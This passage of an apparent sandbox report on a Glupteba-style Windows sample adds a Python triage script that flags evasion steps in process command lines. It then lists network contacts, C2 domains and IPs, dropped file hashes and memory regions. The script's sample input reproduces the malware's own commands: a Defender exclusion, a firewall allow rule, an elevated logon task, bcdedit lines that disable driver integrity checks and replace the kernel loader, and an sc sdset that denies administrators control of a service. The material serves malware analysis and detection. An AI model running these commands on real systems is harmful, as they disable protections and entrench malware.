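The process list above records the whole install chain: a Defender exclusion for the dropper, an inbound firewall rule and a highest-privilege logon task for C:\Windows\rss\csrss.exe, a new BCD entry that turns off integrity checks and points the loader at osloader.exe and ntkrnlmp.exe (both dropped into Temp, see Files below), and an `sc sdset` that rewrites the WinDefender service descriptor. The triage rules below are an added example written for this page, not code from the report or the sample: they take process command lines like the ones above, decode the SDDL so the deny ACE becomes readable, and return one rule hit per evasion step. The rule names, the CONTROL_RIGHTS set and the SAFE_PREFIXES list are this example's own choices; the sample command lines are copied from the list above.

```python
"""Triage rules for process command lines of the kind recorded in the report.

Added example, not part of the sandbox report. The SDDL decoder is the part
worth reading: `sc sdset` replaces a service's whole security descriptor, so a
deny ACE for BA (Administrators) on WP/DT means admins can no longer stop or
pause the service.
"""
import re
from typing import Dict, List

# SDDL two-letter access rights as they apply to service objects
# (generic/standard rights plus the SERVICE_* specific rights).
SERVICE_RIGHTS: Dict[str, str] = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus",
    "SW": "EnumerateDependents", "RP": "Start", "WP": "Stop",
    "DT": "PauseContinue", "LO": "Interrogate", "CR": "UserDefinedControl",
    "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac", "WO": "WriteOwner",
}
# Rights an operator needs to neutralise a rogue service (example's own choice).
CONTROL_RIGHTS = {"WP", "DT", "DC", "SD"}
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "winlogon.exe", "svchost.exe", "services.exe"}
SAFE_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\(([A-Z]{1,2});([A-Z]*);([A-Z]*);([^;]*);([^;]*);([^)]+)\)")

# Sample input: command lines copied from the process list above.
REPORT_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force',
    r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /delete /tn ScheduledUpdate /f',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe',
    r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}',
    r'cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    r'C:\Windows\system32\WerFault.exe -u -p 2604 -s 836',
]


def decode_sddl(sddl: str) -> List[Dict[str, object]]:
    """Split an SDDL string into ACE dicts; rights become a list of 2-letter codes."""
    aces: List[Dict[str, object]] = []
    for m in ACE_RE.finditer(sddl):
        ace_type, flags, rights, _obj, _inh, trustee = m.groups()
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "rights": codes, "trustee": trustee})
    return aces


def triage(cmdline: str) -> List[str]:
    """Return rule hits for one command line (empty list means nothing matched)."""
    hits: List[str] = []
    low = cmdline.lower()

    # sc sdset <service> <SDDL>: flag deny ACEs that strip control from Administrators.
    m = re.search(r"\bsc(?:\.exe)?\s+sdset\s+(\S+)\s+(\S+)", cmdline, re.I)
    if m:
        svc, sddl = m.groups()
        for ace in decode_sddl(sddl):
            denied = sorted(SERVICE_RIGHTS[c] for c in ace["rights"] if c in CONTROL_RIGHTS)
            if ace["type"] == "D" and ace["trustee"] == "BA" and denied:
                hits.append(f"service-lockdown: Administrators denied {','.join(denied)} on {svc}")

    # bcdedit: integrity checks off, or kernel/loader binary replaced on a boot entry.
    if "bcdedit" in low:
        if re.search(r"\bnointegritychecks\s+(1|yes|on)\b", low):
            hits.append("bcd-dse-bypass: boot entry sets nointegritychecks=1")
        m = re.search(r"[-/]set\s+\{[^}]+\}\s+(kernel|path)\s+(\S+)", cmdline, re.I)
        if m:
            hits.append(f"bcd-boot-binary-override: {m.group(1).lower()}={m.group(2)}")

    # netsh advfirewall: inbound allow for a program outside the usual system locations.
    m = re.search(r'advfirewall\s+firewall\s+add\s+rule\b.*?\baction=allow\b.*?\bprogram="?([^"\s]+)', cmdline, re.I)
    if m:
        prog = m.group(1)
        name = prog.rsplit("\\", 1)[-1].lower()
        if not prog.lower().startswith(SAFE_PREFIXES):
            tag = " (system-binary name outside System32)" if name in SYSTEM_NAMES else ""
            hits.append(f"firewall-allow: inbound rule for {prog}{tag}")

    # schtasks /CREATE with /RL HIGHEST: elevated persistence.
    m = re.search(r'schtasks(?:\.exe)?\s+/create\b.*?/rl\s+highest\b.*?/tr\s+"?([^"]+?)"?\s+/tn\s+(\S+)', cmdline, re.I)
    if m:
        hits.append(f"scheduled-task-highest: {m.group(2)} runs {m.group(1)} at logon with highest privileges")

    # Add-MpPreference -Exclusion*: Defender exclusion added from the command line.
    if re.search(r"add-mppreference\b.*-exclusion(path|process|extension)", low):
        hits.append("defender-exclusion: Add-MpPreference adds a Defender exclusion")

    return hits


def triage_all(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each rule family to the command lines that triggered it."""
    out: Dict[str, List[str]] = {}
    for c in cmdlines:
        for h in triage(c):
            out.setdefault(h.split(":", 1)[0], []).append(c)
    return out


if __name__ == "__main__":
    for family, cmds in triage_all(REPORT_CMDLINES).items():
        print(family)
        for c in cmds:
            print("   ", c)
```

Decoding the descriptor shows why the service is hard to remove: `(D;;WPDT;;;BA)` denies Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, and the allow ACE for BA omits those two rights as well, so a stop request from an admin token is refused. BA does keep WD (WriteDac), so an operator can reapply a sane descriptor with `sc sdset` and then stop the service; the BCD entry is separate and has to be deleted with `bcdedit /delete` on its GUID.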
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | nic-it.nl | udp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | N/A | tcp |
| RU | 193.233.132.234:80 | N/A | tcp |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| US | 172.67.182.192:443 | onlycitylink.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| US | 172.67.193.79:443 | realdeepai.org | tcp |
| DE | 138.201.79.103:80 | nic-it.nl | tcp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.60.76:443 | firstfirecar.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| DE | 185.172.128.90:80 | N/A | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.246:80 | download.iolo.net | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | 9f16c723-2fae-4073-ae52-49abeeeb004f.uuid.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.148:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server9.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.sipgate.net | udp |
| US | 3.33.249.248:3478 | stun.sipgate.net | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| DE | 185.172.128.150:80 | N/A | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
| N/A | 127.0.0.1:31465 | N/A | tcp |
| BG | 185.82.216.96:443 | server9.thestatsfiles.ru | tcp |
Files
memory/2604-0-0x000007FEF5053000-0x000007FEF5054000-memory.dmp
memory/2604-1-0x0000000001060000-0x000000000108A000-memory.dmp
memory/2604-2-0x0000000000FA0000-0x0000000000FFE000-memory.dmp
memory/2604-3-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp
memory/2128-8-0x0000000002980000-0x0000000002A00000-memory.dmp
memory/2128-9-0x000000001B4B0000-0x000000001B792000-memory.dmp
memory/2128-10-0x0000000001C80000-0x0000000001C88000-memory.dmp
memory/2796-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-17-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-15-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-13-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-19-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2796-20-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-21-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2796-22-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar2D0C.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Local\Temp\Cab2D0D.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3be1cd8e8a989028f9df839489f2b3a4 |
| SHA1 | 464eff20494b8b40e90af864d63415895a375b60 |
| SHA256 | 61b06c55ae3ca320af282806ac68fcd8c83672544e7ca60277c88f8ac41af500 |
| SHA512 | 39a5d3ed9e3c953af4a415ce91316a49abe978d3a7d2285884fcf0f6130bac10888481cbfd1ec5a578fdeb5d9dbad11264e746e7bd6d4d98f0be2b5fd52ca86c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a510c44149273e42339d145eb4b141d1 |
| SHA1 | 8554ab55857c1e2152275ea08afeafbc74213d8b |
| SHA256 | 6ddd0e3f79d4ea6b2e4fd75ed2431e18cde4458b4b0b5ab4162f65fa3e073f7f |
| SHA512 | 048b5971fe2111e5ed02f4ac1b76f62dcb1901cbc87088a735f5064509864c33d256fbfe00197356fbba31cf0e83fdb550e93c4ca0d5e19402876da64969198d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8797a9bab9dc1c4ef157524b6ce678b4 |
| SHA1 | 9d4963f11585e1740db82d7067dcd61ed3808f2f |
| SHA256 | 0add7a0cc2045d9fc5220f844d9fba333472ec58af809066babdb248f1ec9a28 |
| SHA512 | 6ffd3fd65e3422ca1256ef5e22468e2cd6236ae825a27d077d2913659ed2dcd8d2d709aaa21a67d1ad3d2311a016af06649652cbceaa841f4b65fac5e5686d80 |
\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
| MD5 | 5b1e924864690254027a694596f93e64 |
| SHA1 | 009944ff319f0d966db4f3997ba9f87692f7ce8f |
| SHA256 | a227c8047a9b2cff19327b822c89378d4549f0baee2af1e7345e8ede3adbe29e |
| SHA512 | bbb54905892328d16743d2d953df4ac2c10192ac76b4a99248f64d0c675d487bf74af007d52e2196e80bfa61e84fe7604c8f6be5620102bc1d7820dd89e2d798 |
\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
| MD5 | 9da2ccfd03fcc77b189df9df555b36bf |
| SHA1 | 9367ac8be24bfcd192bb6981f8e24b3c3cc630ec |
| SHA256 | 6cd1adb5a2be81ba9441b69bb45a493b58e82b58ad3e4f2c93861c23f9b38d88 |
| SHA512 | 627cb25cbe42c1a444d13a3041644af00e59a20cc1590b7664a22a7596b10f279aec2f2d0dbac79616eca0457202cd1982fe7257134d653d15baa5fcd51cae8a |
\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
| MD5 | 8938be9b1ac1f7cfc1104628fd55c164 |
| SHA1 | 3f85babacf62c0443b17c7c5af470dd11648e3b3 |
| SHA256 | 2f000b4830c2267d4b1d17231a5c249b79a0d62ff2bfd0ef3d01763a5d1b4d03 |
| SHA512 | ba2619bbc481c70d85eaf862b60e8cdf4c588540742a8343b057f95212468c41b1ea244376c9122feb69d236cfdc2c2d423c29acb458e40a12c947a398b55a92 |
memory/2308-249-0x00000000042B0000-0x00000000046A8000-memory.dmp
memory/2160-250-0x00000000041F0000-0x00000000045E8000-memory.dmp
memory/948-252-0x0000000004210000-0x0000000004608000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1ls.0.exe
| MD5 | ac3b1a30e96b6d89ce98a21bb5b2093a |
| SHA1 | 4270104678195b8cad3520a704c556155a0a65b5 |
| SHA256 | 803946c2712aec2b60b54b3cd7c3375a9a0158e7ccbfbd4ab8a66e6ddfc7d463 |
| SHA512 | 65e74527ffa9d6e776d063db44322080315a5a9eb13bb67acd61be6e65862ec127366d742beca349c7ca8281e2f67193bafc14c8c0ee3f222b19b452d05c8491 |
memory/692-266-0x00000000041B0000-0x00000000045A8000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1ls.1.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/2080-287-0x0000000000400000-0x0000000002597000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 9879d2f6426cfd242f8bf14e1b1497ce |
| SHA1 | 74933816cb70f25dae8f8e7d7f6fd6bc21872227 |
| SHA256 | 7c7bdb740839e609b3cd04df32d30bbc7e800029375419371f9f83d9c69bea3f |
| SHA512 | 133cf38ace0da0414e35e4d93faee43910b0f899c7d600ff0cc8bcf0c6f3167df2e973b752a9fa042f0f3bf3c91ac3771c975c05eb6f05f3d9a27185379ac4d5 |
memory/2308-311-0x0000000000400000-0x0000000002957000-memory.dmp
memory/948-312-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2160-313-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-314-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2604-316-0x000007FEF5053000-0x000007FEF5054000-memory.dmp
memory/840-315-0x0000000000400000-0x0000000002574000-memory.dmp
memory/1608-317-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2604-318-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp
memory/948-343-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1728-344-0x0000000004210000-0x0000000004608000-memory.dmp
memory/2160-346-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2308-345-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-347-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2308-352-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2160-353-0x0000000000400000-0x0000000002957000-memory.dmp
memory/692-354-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 0f6de58ed7bc31e0f8f79b5301c6adad |
| SHA1 | 776cf3bbedde0d754dc0de3b52ff1a6485decb2e |
| SHA256 | 99c2851dcd6f349e087a2c8bb2839f9e09bbd94f6c75a1026b7ed31534341f24 |
| SHA512 | 99535a0d27f57d72ce7181d8a71958daa59e6a4722ed18df000bbd6cd88ed345b43e143c27f4fc172f10dd48389f4538d0370b5caeea81a89e0215f85830ce75 |
memory/1332-363-0x0000000004280000-0x0000000004678000-memory.dmp
memory/1784-362-0x0000000004270000-0x0000000004668000-memory.dmp
memory/1728-373-0x0000000000400000-0x0000000002957000-memory.dmp
memory/832-374-0x00000000043F0000-0x00000000047E8000-memory.dmp
memory/1608-378-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2932-379-0x00000000042A0000-0x0000000004698000-memory.dmp
memory/1608-380-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2032-381-0x0000000000D80000-0x00000000045B4000-memory.dmp
memory/832-384-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1332-383-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1784-385-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/2368-391-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2368-405-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 43d56c88d39f168ff893a9da3f186556 |
| SHA1 | b16f0b7153d9a187bd47cac26b3a9fcc30bab431 |
| SHA256 | 04d40d86ff32023f5890dd8926199bb67036472d0028eff02241c7c2d39428b5 |
| SHA512 | 72fa98226be84f12a0ce03520e5afac06913a18290623499d9e0a18ee32e9dd86cceee5693d65f0fef91e27ead7e572691b939f54af31f72fb1b00fa9ee4cd2f |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2032-463-0x000000001EE30000-0x000000001EF3A000-memory.dmp
memory/2032-465-0x0000000000BD0000-0x0000000000BDC000-memory.dmp
memory/2032-464-0x0000000000540000-0x0000000000550000-memory.dmp
memory/2032-466-0x0000000000B10000-0x0000000000B24000-memory.dmp
memory/2032-467-0x000000001E490000-0x000000001E4B4000-memory.dmp
memory/2032-474-0x0000000000370000-0x000000000037A000-memory.dmp
memory/2032-475-0x00000000006D0000-0x00000000006FA000-memory.dmp
memory/2032-476-0x000000001F510000-0x000000001F5C2000-memory.dmp
memory/840-477-0x0000000000400000-0x0000000002574000-memory.dmp
memory/2032-478-0x0000000000380000-0x000000000038A000-memory.dmp
memory/2032-482-0x000000001FD60000-0x0000000020060000-memory.dmp
memory/2032-486-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2032-485-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2932-484-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2032-487-0x00000000059C0000-0x00000000059CA000-memory.dmp
memory/2032-488-0x000000001E9A0000-0x000000001EA02000-memory.dmp
memory/2032-489-0x00000000059D0000-0x00000000059F2000-memory.dmp
memory/2032-492-0x000000001E300000-0x000000001E30C000-memory.dmp
memory/2032-497-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2032-496-0x0000000000520000-0x000000000052A000-memory.dmp
memory/2932-499-0x0000000000400000-0x0000000002957000-memory.dmp
memory/2932-504-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\63f93027eed6195cee9d6793abbff365863d6c04fe54f71a30d295ffeacda31a\e71d4ecc3a0a47099d52437ef9d6ac62.tmp
| MD5 | 66c2705e059a053c7a2bee2e6a4e244b |
| SHA1 | 7a6bc287e6dfcc866315aefe8eb71d142d8d6935 |
| SHA256 | 728ba6a9f43412932ab6e26174da8d3decc3caddafd2f29cf3432c89e8729a39 |
| SHA512 | 6f63ad1626c2b5ca4970d153be109131a42ceff16e2419e25c130df23cacf45b6ab4f6dd63df63fb80e10f9df2f97e3403866568de0801b28a3da75ca1c8c77f |
memory/2932-508-0x0000000000400000-0x0000000002957000-memory.dmp
memory/840-514-0x0000000000400000-0x0000000002574000-memory.dmp
memory/2932-515-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1748-561-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1748-565-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2320-568-0x0000000000400000-0x00000000008DF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-08 23:52
Reported
2024-05-08 23:57
Platform
win10-20240404-en
Max time kernel
296s
Max time network
300s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
